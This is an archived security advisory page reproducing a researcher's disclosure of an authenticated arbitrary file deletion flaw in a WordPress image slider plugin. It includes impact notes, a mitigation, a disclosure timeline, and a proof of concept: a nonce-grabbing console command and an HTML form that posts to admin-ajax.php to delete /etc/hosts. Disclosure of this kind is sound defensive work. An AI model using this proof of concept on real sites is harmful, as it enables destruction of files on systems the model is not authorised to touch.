what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Image Slider 1.1.41 / 1.1.89 Arbitrary File Deletion

WordPress Image Slider 1.1.41 / 1.1.89 Arbitrary File Deletion
Posted Dec 27, 2016
Authored by Tom Adams

WordPress Image Slider plugin versions 1.1.41 and 1.1.89 suffer from an arbitrary file deletion vulnerability.

tags | exploit, arbitrary
SHA-256 | d26c0835b8209ca0f2b538837df8ceca4fa3b26c17c033bd4da15d6d4bce5a72

WordPress Image Slider 1.1.41 / 1.1.89 Arbitrary File Deletion

Change Mirror Download
Details
================
Software: Image Slider
Version: 1.1.41,1.1.89
Homepage: http://wordpress.org/plugins/image-slider-widget/
Advisory report: https://security.dxw.com/advisories/arbitrary-file-deletion-vulnerability-in-image-slider-allows-authenticated-users-to-delete-files/
CVE: Awaiting assignment
CVSS: 5.5 (Medium; AV:N/AC:L/Au:S/C:P/I:P/A:N)

Description
================
Arbitrary file deletion vulnerability in Image Slider allows authenticated users to delete files

Vulnerability
================
Any user able to create or edit aSlidersa (the same users who can create/edit posts, as far as I can tell) is able to delete arbitrary files that the web user has permission to write to. In addition, the attackerA is toldA whether that operation succeeded or failed.
Depending on configuration this could lead to the attacker being able to:

Delete media uploads
Delete plugin files (this would be especially bad if there were security plugins limiting the attackeras abilities)
Delete important system files (/etc/hosts, /usr/bin/php)
AttemptA to delete unimportant files in order to discoverA more information about the system (i.e. attempting to deleteA /usr/share/doc/apt/changelog.gz would have little effect on the system if successful but it would tell the attacker that the host is running a Debian derivative)


Proof of concept
================

First, make sure you have a file to delete. Iam going to use /etc/hosts as an example because it demonstrates that youare not limited to files within the WordPress installation, but make sureA whichever file you use can be deleted by the user account WordPress is running under
VisitA /wp-admin/post-new.php?post_type=easyimageslider
Input the following JavaScript in the inspectoras consoleA to get the nonce value: document.querySelector(\'[data-tnonce]\').dataset[\'tnonce\']
Create a page containing the following code, replace NONCE with the nonce you got in the previous step, visit the page and click submit

<form action=\"http://localhost/wp-admin/admin-ajax.php\" method=\"POST\">
<input type=\"text\" name=\"action\" value=\"ewic_timthumb_check\">
<input type=\"text\" name=\"turl\" value=\"/etc/hosts\">
<input type=\"text\" name=\"security\" value=\"NONCE\">
<input type=\"submit\">
</form>
If WordPress is being run as root (or if the web user has permission to write to that file) then the page will display a1a, if not it wonat display anything.

Mitigations
================
DisableA the plugin. No fixed version is known.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2015-10-29: Discovered
2016-12-09: Reported to vendor via info@ghozylab.com
2016-12-23:A Vendor has not respondedA after 14 days
2016-12-23: Published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.




Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close